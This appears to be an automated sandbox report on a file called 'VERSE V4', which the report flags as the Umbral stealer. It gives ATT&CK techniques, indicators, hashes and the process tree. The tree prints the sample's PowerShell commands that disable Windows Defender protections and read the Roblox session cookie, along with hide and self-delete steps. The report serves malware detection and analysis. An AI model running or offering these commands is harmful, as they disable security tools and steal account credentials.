umbral | hxxps://gofile[.]io/d/xkQZSf

Analysis

max time kernel
31s
max time network
33s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
01-09-2024 19:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/xkQZSf

Score

10^/10

umbral credential_access discovery execution stealer

Malware Config

Signatures

Detect Umbral payload 1 IoCs

resource	yara_rule
behavioral1/memory/3672-95-0x00000236E22E0000-0x00000236E235E000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2896	powershell.exe
3112	powershell.exe
4776	powershell.exe
2760	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	VERSE V4.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
57	discord.com
58	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
53	ip-api.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3556	cmd.exe
4496	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1204	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133696925099482310"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings	chrome.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4496	PING.EXE

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
3212	chrome.exe
3212	chrome.exe
3672	VERSE V4.exe
3672	VERSE V4.exe
2896	powershell.exe
2896	powershell.exe
2896	powershell.exe
3112	powershell.exe
3112	powershell.exe
3112	powershell.exe
4776	powershell.exe
4776	powershell.exe
4776	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
2760	powershell.exe
2760	powershell.exe
2760	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3212	chrome.exe
Token: SeCreatePagefilePrivilege	3212	chrome.exe
Token: SeShutdownPrivilege	3212	chrome.exe
Token: SeCreatePagefilePrivilege	3212	chrome.exe
Token: SeShutdownPrivilege	3212	chrome.exe
Token: SeCreatePagefilePrivilege	3212	chrome.exe
Token: SeShutdownPrivilege	3212	chrome.exe
Token: SeCreatePagefilePrivilege	3212	chrome.exe
Token: SeShutdownPrivilege	3212	chrome.exe
Token: SeCreatePagefilePrivilege	3212	chrome.exe
Token: SeShutdownPrivilege	3212	chrome.exe
Token: SeCreatePagefilePrivilege	3212	chrome.exe
Token: SeShutdownPrivilege	3212	chrome.exe
Token: SeCreatePagefilePrivilege	3212	chrome.exe
Token: SeShutdownPrivilege	3212	chrome.exe
Token: SeCreatePagefilePrivilege	3212	chrome.exe
Token: SeShutdownPrivilege	3212	chrome.exe
Token: SeCreatePagefilePrivilege	3212	chrome.exe
Token: SeShutdownPrivilege	3212	chrome.exe
Token: SeCreatePagefilePrivilege	3212	chrome.exe
Token: SeShutdownPrivilege	3212	chrome.exe
Token: SeCreatePagefilePrivilege	3212	chrome.exe
Token: SeShutdownPrivilege	3212	chrome.exe
Token: SeCreatePagefilePrivilege	3212	chrome.exe
Token: SeShutdownPrivilege	3212	chrome.exe
Token: SeCreatePagefilePrivilege	3212	chrome.exe
Token: SeShutdownPrivilege	3212	chrome.exe
Token: SeCreatePagefilePrivilege	3212	chrome.exe
Token: SeShutdownPrivilege	3212	chrome.exe
Token: SeCreatePagefilePrivilege	3212	chrome.exe
Token: SeShutdownPrivilege	3212	chrome.exe
Token: SeCreatePagefilePrivilege	3212	chrome.exe
Token: SeShutdownPrivilege	3212	chrome.exe
Token: SeCreatePagefilePrivilege	3212	chrome.exe
Token: SeShutdownPrivilege	3212	chrome.exe
Token: SeCreatePagefilePrivilege	3212	chrome.exe
Token: SeShutdownPrivilege	3212	chrome.exe
Token: SeCreatePagefilePrivilege	3212	chrome.exe
Token: SeShutdownPrivilege	3212	chrome.exe
Token: SeCreatePagefilePrivilege	3212	chrome.exe
Token: SeShutdownPrivilege	3212	chrome.exe
Token: SeCreatePagefilePrivilege	3212	chrome.exe
Token: SeShutdownPrivilege	3212	chrome.exe
Token: SeCreatePagefilePrivilege	3212	chrome.exe
Token: SeDebugPrivilege	3672	VERSE V4.exe
Token: SeIncreaseQuotaPrivilege	1364	wmic.exe
Token: SeSecurityPrivilege	1364	wmic.exe
Token: SeTakeOwnershipPrivilege	1364	wmic.exe
Token: SeLoadDriverPrivilege	1364	wmic.exe
Token: SeSystemProfilePrivilege	1364	wmic.exe
Token: SeSystemtimePrivilege	1364	wmic.exe
Token: SeProfSingleProcessPrivilege	1364	wmic.exe
Token: SeIncBasePriorityPrivilege	1364	wmic.exe
Token: SeCreatePagefilePrivilege	1364	wmic.exe
Token: SeBackupPrivilege	1364	wmic.exe
Token: SeRestorePrivilege	1364	wmic.exe
Token: SeShutdownPrivilege	1364	wmic.exe
Token: SeDebugPrivilege	1364	wmic.exe
Token: SeSystemEnvironmentPrivilege	1364	wmic.exe
Token: SeRemoteShutdownPrivilege	1364	wmic.exe
Token: SeUndockPrivilege	1364	wmic.exe
Token: SeManageVolumePrivilege	1364	wmic.exe
Token: 33	1364	wmic.exe
Token: 34	1364	wmic.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3212 wrote to memory of 4064	3212	chrome.exe	83
PID 3212 wrote to memory of 4064	3212	chrome.exe	83
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2424	3212	chrome.exe	84
PID 3212 wrote to memory of 2892	3212	chrome.exe	85
PID 3212 wrote to memory of 2892	3212	chrome.exe	85
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86
PID 3212 wrote to memory of 1708	3212	chrome.exe	86

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4696	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://gofile.io/d/xkQZSf
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd2db6cc40,0x7ffd2db6cc4c,0x7ffd2db6cc58
  2⤵
  PID:4064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1952,i,14858978388864261836,15731980895085336272,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1948 /prefetch:2
  2⤵
  PID:2424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1920,i,14858978388864261836,15731980895085336272,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2124 /prefetch:3
  2⤵
  PID:2892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2248,i,14858978388864261836,15731980895085336272,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1696 /prefetch:8
  2⤵
  PID:1708
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,14858978388864261836,15731980895085336272,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3140 /prefetch:1
  2⤵
  PID:3332
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,14858978388864261836,15731980895085336272,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3188 /prefetch:1
  2⤵
  PID:2136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4520,i,14858978388864261836,15731980895085336272,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4016 /prefetch:1
  2⤵
  PID:4248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4612,i,14858978388864261836,15731980895085336272,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3152 /prefetch:1
  2⤵
  PID:1184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4752,i,14858978388864261836,15731980895085336272,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4576 /prefetch:8
  2⤵
  PID:1340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4776,i,14858978388864261836,15731980895085336272,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5028 /prefetch:8
  2⤵
  PID:3448

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4532

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4172

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_VERSE+V4.zip\VERSE V4\KEY.txt
1⤵
PID:1412

C:\Users\Admin\Downloads\VERSE+V4\VERSE V4\VERSE V4.exe
"C:\Users\Admin\Downloads\VERSE+V4\VERSE V4\VERSE V4.exe"
1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3672
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1364
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\Downloads\VERSE+V4\VERSE V4\VERSE V4.exe"
  2⤵
  - Views/modifies file attributes
  PID:4696
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\VERSE+V4\VERSE V4\VERSE V4.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3112
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4776
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4164
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:4024
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:1676
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:4148
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2760
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:1204
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\VERSE+V4\VERSE V4\VERSE V4.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:3556
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4496

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
b6956c8149aa1e5bbb1e43f070bf0fb9

SHA1
974eb99852adc5586d0c9881ce8c0b66022e774c

SHA256
0e470b841a25e21f44e25c1bf5a7efac3b686216290491f7c380d49f5566a70a

SHA512
ac9ad3e57e851917f6bc752b0237359515e17d8d93d8931a14813b6793e2440c4b56cac74d4dcabb576215673dc910395422120dbf0f3003cb6da81af154875b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
336B

MD5
0d13224d6acdd3380391df1f532ddfdb

SHA1
e83e890071322ea0c743758a98b5a18f9609f974

SHA256
74cca1c89f29c6c008056b5483388a183679750ea274996d6325f2a1ba16f12a

SHA512
c027d95c3202a68a377327499df5e6125a4b666b94ea178f30cb83023e14f59dba43c065dbcdf21d7ee22ba8ee2f63a45b4774b0d1543f63a1137d9d4309e428

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log

Filesize
438B

MD5
ced5fcbae96c2def5ff2188bd1f8668f

SHA1
e407d51490cc82fb3fc3d882326421ed4c931c2a

SHA256
3a0c7f98ccf0a123be0aae67b714a320adec07e4ba9506d37889fa4f7d7a8515

SHA512
3f5957a9324a8b5061b40f97c8db7c8281d43f9d4b0b6e158befdcf671c67cbd731d2e0ac575dfd35b5c32fe7f406dca65f4bee2d660a7616bb3dfcce4e04f45

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
688B

MD5
10d07998ee3f35cdf8939bee398e2a4a

SHA1
954d5fb64e8bdd53f4158f12552aaa593a17740f

SHA256
aa11a023c10d4e7f21f6cba00ad0d43f79b3dd7f8a03de988d10c5e493bcbf87

SHA512
c0600efb39013d295eee55b9ed617c41296f35d112195112dec5e62f797cbe61753e259fd4dcb0ecf152c375d5208fe29103eb34156f382942876a846d8f6053

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
6e51a5957b12092ad147927b83267b87

SHA1
032ff54109a217c9889fe818b01df44af3f31229

SHA256
6216b9ebef94ce4bbfef7986aa5b4d7c2a9720221d7b6380628d304cf0756555

SHA512
a773396388ff9e82af42d92035d87018711ff2fd0a66a4c445b8bd3a79a2c059dc063b744f40ab7bb4d654374ea1e00c332efb1088680adfe39afb8872767ff0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
6ae1c6434b4dae73d116f565dadc3bfe

SHA1
a50e391d0e40ef45a18ff157c9a9118ef5646d44

SHA256
3bce32a0449c2de927bb0f3a3c1a0b64f9344faebe2d9ac650974144ad64a870

SHA512
7c53c259579bdf452e6281a74cc3a4d3003ffc20dadd4a7180c78dd4b2142878e0b6c08d4996369d1c9773650f5b286f7641e769f90da7eb3f943d5bd3551943

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
99KB

MD5
f613c9e1aa5fb15c5b835d2557a210a8

SHA1
592d82ca58ad62849317264719525b679846bb87

SHA256
bff8eacaa82713f61771383f9a69528b2fadb9ee92ff7643df867978467aecd9

SHA512
06d19ed85ead7dcabdaece363d9f41ccab8885d54043231548be13014b43bed273b0ad41d293673e043b28590157c9f4e2298b378ce334c72538eac61accf860

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
2af06a6b36db9473e4a7d9c7ab72b70b

SHA1
8ef34b9b961e51bdd1b8d7d9db2ec1b0a4764645

SHA256
18a2aa7e245c6732f95fb7749b2b4d29007f2c56a9c5bfbc5e3c127bdfe5f158

SHA512
3495567a5d5af94ae27be51313d9e2630c52017d808042fe0d56baa34fa1d246eb15c253d14c77c77a1d8f2f1c81680e623044ae95415b095696e7fa141ac7cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e0ec6bf376a6b15852bce768196c5ed0

SHA1
05fe4e592ebbb7e29f36b8d30a6a90ba29bd4f81

SHA256
2d4a39cbbd597a7cfff477817c3c7c541c14974c8d234b4c0de6d229e3a3ce97

SHA512
dc0c7d3d127c88affea9ae402d7358c079cfa7fc3ecb417085e31dc749da1406e72563bfbe42167fdad57e10aa0c6cca7a8ba06921b3a1212ad7ccee1a0f859b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8bb4d69f68c8948fce3ec1e261dff619

SHA1
bf12e2852763f984f0496c941d16f9ba899e7f37

SHA256
ee84ee0ae4a0f1016bc36e2c180bfb82d7c877c5695fc51476cce9b1d0b20632

SHA512
d23233d97660bf6568af2cfd7a45aa6e26bf76437dbfca0d460ca3d232f30d5fcfedb7c487418df985992b420e156e30e1482b13c94052e92b95afd1f2682519

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pnl1y4he.l55.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\VERSE+V4.zip

Filesize
247KB

MD5
c8884b2c444ae24c2924a515728d8bfb

SHA1
2eac136bf96d89bc3b22de933aed842729f14361

SHA256
051cbe79e75e59cc2527206047b51784fbb58afc40f3d504cf2bcea3f5ed439f

SHA512
c6f8023fd26edebd30e4d58ee2f3365db2d4d6af89dc8f06a8867029ad515941d590211e1a3f4581c4c60c58c586824f7df118505cb209c4aa1223568dc719b4

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

